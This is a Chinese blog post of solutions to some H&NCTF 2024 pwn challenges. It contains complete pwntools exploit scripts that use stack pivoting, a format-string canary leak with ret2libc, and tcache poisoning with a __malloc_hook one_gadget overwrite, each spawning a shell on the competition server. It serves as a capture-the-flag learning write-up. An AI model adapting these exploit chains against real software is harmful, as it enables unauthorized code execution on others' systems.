feichai's Blog
0%

H&NCTF 2024 pwn 部分题解

发表于 更新于 分类于
本文字数: 4.7k 阅读时长 ≈ 4 分钟

几十个解的题还是能写出来的,但是几个解和0解的题做不出来,我还是太菜了

close

重定向就可以了

1
exec 1>&2

ez_pwn

考一个栈迁移,第一个printf泄露栈地址,然后利用程序自带的2个leave ret完成栈迁移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
local_file = '../ctf_file/pwn'
libc=ELF("/home/feichai/glibc-all-in-one/libs/2.23-0ubuntu3_i386/libc.so.6", checksec = False)
elf=ELF(local_file)

#io = process(local_file)
io = remote('hnctf.imxbt.cn', 46959)


def lg(s, addr):
    return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')

def dbg():
    gdbscript = '''
    b *0x08048616
    b *0x08048631
    b *0x08048666
    '''
    gdb.attach(io,gdbscript)
    pause()

r   = lambda a:   io.recv(a)
ru  = lambda a:   io.recvuntil(a)
s   = lambda a:   io.send(a)
sa  = lambda a,b: io.sendafter(a,b)
sl  = lambda a:   io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)

system = 0x0804857D
backdoor = 0x08048566

sa(b'your name?',b'a'*0x2c)
ru(b'a'*0x2c)
stack_addr = u32(r(4))
lg("stack_addr",stack_addr)
input_addr = stack_addr- 0x38
lg("input_addr",input_addr)
s(p32(system)+p32(input_addr+20)*2+b'sh\x00\x00'*8+p32(input_addr-4))

io.interactive()

idea

输入-1转化为unsigned int变成大数造成栈溢出,fmt泄露canary,然后就是经典的ret2libc了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
local_file = '../ctf_file/idea'
libc=ELF("/home/feichai/ctf_libc/puts_150/libc6-i386_2.23-0ubuntu11.3_amd64.so", checksec = False)
elf=ELF(local_file)

debug = 0
if debug:
    io = process(local_file)
else:
    io = remote('hnctf.imxbt.cn', 48805)

def lg(s, addr):
    return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')

def dbg():
    gdbscript = '''
    b *0x080486CF
    b *0x080486E9
    '''
    gdb.attach(io,gdbscript)
    pause()

r   = lambda a:   io.recv(a)
ru  = lambda a:   io.recvuntil(a)
s   = lambda a:   io.send(a)
sa  = lambda a,b: io.sendafter(a,b)
sl  = lambda a:   io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)

puts_plt = elf.plt.puts
puts_got = elf.got.puts
vuln = elf.sym.vuln
#dbg()
sla(b'me to read?',b'-1')
sla(b'u a gift!',b'%7$p')
ru(b'0x')
#leak_addr = int(r(8),16)
#libc_addr = leak_addr - libc.sym[b'__libc_start_main'] - 247
canary = int(r(8),16)
lg('canary',canary)
pd = b'a'*0x20+p32(canary)+p32(0)*3+p32(puts_plt)+p32(vuln)+p32(puts_got)
sla(b'bytes of data!\n',pd)

puts_addr = u32(ru(b'\xf7')[-4:])
lg('puts_addr',puts_addr)
libc_base = puts_addr - libc.sym['puts']
lg('libc_base',libc_base)

libc_system = libc_base + libc.symbols[b'system']
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))

sla(b'me to read?',b'-1')
sla(b'u a gift!',b'aaaa')

pd = b'a'*0x20+p32(canary)+p32(0)*3+p32(libc_system) + p32(0) +p32(bin_sh_addr)
sla(b'bytes of data!\n',pd)

io.interactive()

what

tcache 投毒 + uaf漏洞 + 劫持__malloc_hook,修改__malloc_hook为gadget即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['gnome-terminal', '-e']
local_file = '../ctf_file/what'
libc=ELF("/home/feichai/ctf_file/libc-2.27.so", checksec = False)
elf=ELF(local_file)

debug = 0
if debug:
    io = process(local_file)
else:
    io = remote('hnctf.imxbt.cn', 50228)

def lg(s, addr):
    return info(f'\033[1;33m{f"{s}-->0x{addr:02x}"}\033[0m')

def dbg():
    gdbscript = '''
    '''
    gdb.attach(io,gdbscript)
    pause()

r   = lambda a:   io.recv(a)
ru  = lambda a:   io.recvuntil(a)
s   = lambda a:   io.send(a)
sa  = lambda a,b: io.sendafter(a,b)
sl  = lambda a:   io.sendline(a)
sla = lambda a,b: io.sendlineafter(a,b)

def choice(index):
    sla('Enter your command:',str(index))

def add(size):
    choice(1)
    sla('size:',str(size))

def free():
    choice(2)

def show(index):
    choice(3)
    sla('please enter idx:',str(index))

def edit(index,content):
    choice(4)
    sla('please enter idx:',str(index))
    sa('your content:',content)

for i in range(9):
    add(0x80)

for i in range(7):
    free()

free() #1
show(1)

ru("Content:")
libc_leak = u64(r(6).ljust(8,b'\x00'))
lg('libc_leak',libc_leak)

libc_base = libc_leak - 0x3ebca0 #0x3ebca0
lg('libc_base',libc_base)

malloc_hook = libc_base + libc.sym["__malloc_hook"]
one_gadget = [0x4f29e,0x4f2a5,0x4f302,0x10a2fc]
gadget = libc_base + 0x10a2fc

edit(2,p64(malloc_hook))
add(0x80) #1
add(0x80) #2
edit(2,p64(gadget)*8)
add(0x20)
#dbg()

io.interactive()
-------------本文结束感谢您的阅读-------------

欢迎关注我的其它发布渠道